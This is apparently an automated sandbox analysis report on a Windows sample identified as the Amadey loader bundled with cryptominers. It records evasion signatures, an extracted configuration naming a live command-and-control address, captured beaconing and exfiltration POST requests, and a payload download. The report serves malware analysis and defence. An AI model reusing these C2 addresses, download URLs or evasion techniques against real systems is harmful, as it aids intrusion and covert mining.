Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1520638
MD5:	dc730eea0eba910485703a74d173f8e2
SHA1:	093f63548d7366b6c3cbfc3ddfca453199e40eca
SHA256:	18894a1a879e0e75c33ec7988c8835b20b42a3fae8c51f1cb4f026f2b855a6b7
Tags:	exeuser-Bitsight
Infos:

Detection

Amadey, BitCoin Miner, SilentXMRMiner

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Amadeys stealer DLL

Yara detected BitCoin Miner

Yara detected SilentXMRMiner

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

C2 URLs / IPs found in malware configuration

Drops executables to the windows directory (C:\Windows) and starts them

Found API chain indicative of debugger detection

Found strings related to Crypto-Mining

Hides threads from debuggers

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

Potentially malicious time measurement code found

Sample is not signed and drops a device driver

Sigma detected: Curl Download And Execute Combination

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Suspicious Script Execution From Temp Folder

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Uses schtasks.exe or at.exe to add and modify task schedules

Allocates memory with a write watch (potentially for evading sandboxes)

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to launch a program with higher privileges

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates driver files

Creates files inside the system directory

Creates job files (autostart)

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains more sections than normal

PE file contains sections with non-standard names

PE file does not import any functions

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Schtasks From Env Var Folder

Sigma detected: Usage Of Web Request Commands And Cmdlets

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Suricata IDS alerts with low severity for network traffic

Too many similar processes found

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://185.215.113.16/Jo89Ku7d/index.php

URL Reputation: Label: phishing

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Avira: detection malicious, Label: TR/Crypt.TPM.Gen

Found malware configuration

Source: 00000001.00000003.1746285062.00000000048C0000.00000004.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.16/Jo89Ku7d/index.php", "Version": "4.41", "Install Folder": "44111dbc49", "Install File": "axplong.exe"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

ReversingLabs: Detection: 50%

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 50%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Code function: 7_2_00402559 CryptBinaryToStringA,malloc,CryptBinaryToStringA,		7_2_00402559
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Code function: 7_2_00402607 CryptStringToBinaryA,malloc,CryptStringToBinaryA,free,		7_2_00402607

Bitcoin Miner

Yara detected BitCoin Miner

Source: Yara match	File source: 85.2.miner2.0.exe.347b538.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 122.2.services64.exe.3434b28.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 122.2.services64.exe.3434b28.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 122.2.services64.exe.3421e28.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 122.2.services64.exe.342b490.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 85.2.miner2.0.exe.3484bd0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 122.2.services64.exe.342b490.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 85.2.miner2.0.exe.347b538.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 85.2.miner2.0.exe.3471ed0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 122.2.services64.exe.3421e28.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 85.2.miner2.0.exe.3484bd0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 107.0.svchost64.exe.10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 85.2.miner2.0.exe.3471ed0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000006B.00000000.2677511483.0000000000012000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 00000055.00000002.2682783373.000000000345A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000007A.00000002.2763019419.000000000340A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: miner2.0.exe PID: 5868, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost64.exe PID: 5992, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: services64.exe PID: 6976, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost64.exe PID: 6772, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost64.exe PID: 7732, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\svchost64.exe, type: DROPPED

Yara detected SilentXMRMiner

Source: Yara match	File source: Process Memory Space: svchost64.exe PID: 6772, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost64.exe PID: 7732, type: MEMORYSTR

Found strings related to Crypto-Mining

Source: svchost64.exe, 0000008B.00000002.2788969573.000000000375D000.00000004.00000800.00020000.00000000.sdmp

String found in binary or memory: I/UnamSanctam/SilentXMRMiner/raw/master/SilentXMRMiner/Resources/xmrig.zipp

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49757 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49763 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49768 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49770 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49771 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49773 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49774 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49776 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49777 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49779 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49780 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49783 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49782 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49786 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49785 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49788 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49789 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49793 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49792 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49795 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49796 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49800 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49801 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49803 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49804 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49806 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49807 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49810 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49811 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49813 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49815 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49816 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49818 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49820 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49822 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49825 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49828 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49830 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49832 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49833 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49836 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49838 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49840 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49843 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49842 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49844 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49846 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49847 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49849 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49851 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49852 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49854 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49855 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49857 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49859 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49861 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49862 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49864 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49867 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49869 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49872 version: TLS 1.2

Source:

Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: svchost64.exe, 0000008B.00000002.2788969573.0000000003616000.00000004.00000800.00020000.00000000.sdmp, svchost64.exe, 00000095.00000002.2847173181.0000000003436000.00000004.00000800.00020000.00000000.sdmp, WR64.sys.139.dr

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49737 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49738 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.16:80 -> 192.168.2.4:49737

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

IPs: 185.215.113.16

Downloads executable code via HTTP

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 27 Sep 2024 15:42:03 GMTContent-Type: application/octet-streamContent-Length: 435820Last-Modified: Fri, 27 Sep 2024 14:49:05 GMTConnection: keep-aliveETag: "66f6c5e1-6a66c"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 12 00 86 a4 f6 66 00 e8 05 00 a8 08 00 00 f0 00 27 00 0b 02 02 1f 00 36 00 00 00 ae 00 00 00 0a 00 00 b0 14 00 00 00 10 00 00 00 00 40 00 00 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 a0 06 00 00 06 00 00 6c d7 06 00 02 00 60 01 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 b0 00 00 0c 10 00 00 00 f0 00 00 c0 45 00 00 00 80 00 00 78 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 68 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b4 00 00 60 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 35 00 00 00 10 00 00 00 36 00 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 e0 00 00 00 00 50 00 00 00 02 00 00 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 50 c0 2e 72 64 61 74 61 00 00 c0 10 00 00 00 60 00 00 00 12 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 70 64 61 74 61 00 00 78 03 00 00 00 80 00 00 00 04 00 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 78 64 61 74 61 00 00 f0 02 00 00 00 90 00 00 00 04 00 00 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 62 73 73 00 00 00 00 80 09 00 00 00 a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 69 64 61 74 61 00 00 0c 10 00 00 00 b0 00 00 00 12 00 00 00 58 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 68 00 00 00 00 d0 00 00 00 02 00 00 00 6a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 e0 00 00 00 02 00 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 72 73 72 63 00 00 00 c0 45 00 00 00 f0 00 00 00 46 00 00 00 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2f 34 00 00 00 00 00 00 d0 04 00 00 00 40 01 00 00 06 00 00 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 31 39 00 00 00 00 00 1e 8e 04 00 00 50 01 00 00 90 04 00 00 ba 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 ea 29 00 00 00 e0 05 00 00 2a 00 00 00 4a 05 00 00 00 00 00 00 00 00 00 00 00 00 00 4

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /UnamSanctam/SilentXMRMiner/raw/master/SilentXMRMiner/Resources/xmrig.zip HTTP/1.1Host: github.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /UnamSanctam/SilentXMRMiner/raw/master/SilentXMRMiner/Resources/xmrig.zip HTTP/1.1Host: github.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: GET /inc/loader_5879465914.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 33 35 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000359001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
